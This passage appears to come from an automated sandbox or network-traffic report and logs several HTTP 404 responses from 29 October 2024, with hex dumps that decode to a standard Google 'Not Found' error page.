70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 